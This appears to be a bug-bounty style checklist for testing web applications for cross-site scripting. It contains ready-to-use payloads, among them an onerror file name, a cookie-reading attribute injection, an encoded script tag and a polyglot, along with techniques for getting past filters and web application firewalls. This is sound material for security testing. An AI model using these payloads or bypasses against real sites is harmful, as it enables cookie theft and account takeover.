Disclaimer: This material is provided solely for educational purposes. You are fully responsible for how you use the information.
We do not encourage any kind of illegal or harmful activity.

1. Basic XSS Testing

   • Try XSS using QuickXSS tool by theinfosecguy.
   • Upload file using '><img src=x onerror=alert(document.domain)>.txt.
   • If script tags are banned, use <h1> and other HTML tags.
   • If output is reflected back inside the JavaScript as a value of any variable, use alert(1).
   • If double quotes (") are filtered, use this payload: /><img src=d onerror=confirm(/tushar/);>.
   • Upload a JavaScript payload using an image file.
   • Change method from POST to GET to bypass filters sometimes.

2. Tag Attribute Value

   • If input lands in an attribute value (e.g., <input type="text" name="state" value="INPUT_FROM_USER">), insert payload like " onfocus="alert(document.cookie)".

3. Syntax Encoding

   • Encode payload as %3cscript%3ealert(document.cookie)%3c/script%3e.

4. XSS Filter Evasion

   • Replace < and > with HTML entities < and >.
   • Use an XSS polyglot, e.g., javascript:/*-></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>.

5. XSS Firewall Bypass

   • Check if the firewall blocks only lowercase characters.
   • Break firewall regex with a new line (\r\n).
   • Try double encoding.
   • Test for recursive filters.
   • Inject anchor tags without whitespace.
   • Bypass whitespaces using bullets.
   • Change the request method.

6. Test For Reflected Cross Site Scripting

   • Verify characters <, >, '', &, and "" are filtered.
   • Test with character escape sequences.
   • Replace < and > with HTML entities < and >.
   • Test payloads with both lower and upper case.
   • Break firewall regex with a new line (\r\n).
   • Use double encoding.
   • Test with recursive filters.
   • Inject anchor tags without whitespace.
   • Replace whitespace with bullets.
   • Change HTTP methods.

7. Test For Stored Cross Site Scripting

   • Identify stored input parameters that reflect on the client-side.
   • Look for input parameters on the profile page.
   • Look for input parameters on the shopping cart page.
   • Look for input parameters on the file upload page.
   • Look for input parameters on the settings page.
   • Look for input parameters on the forum or comment page.
   • Test uploading a file with XSS payload as its file name.
   • Test with HTML tags in various input fields.

8. Advanced XSS Testing

   • Test for DOM-based XSS by examining JavaScript code handling user input.
   • Check for XSS in third-party widgets and plugins.
   • Test XSS in email fields by injecting payloads that can be executed in email clients.
   • Test for XSS in mobile applications using WebView.
   • Verify if Content Security Policy (CSP) headers are in place and effective.
   • Use CSP bypass techniques where CSP is implemented but not correctly configured.
   • Test for XSS via JSONP endpoints.
   • Check if XSS can be triggered in different browser contexts (e.g., Chrome, Firefox, Edge).
   • Test for reflected and stored XSS in multi-step forms and wizards.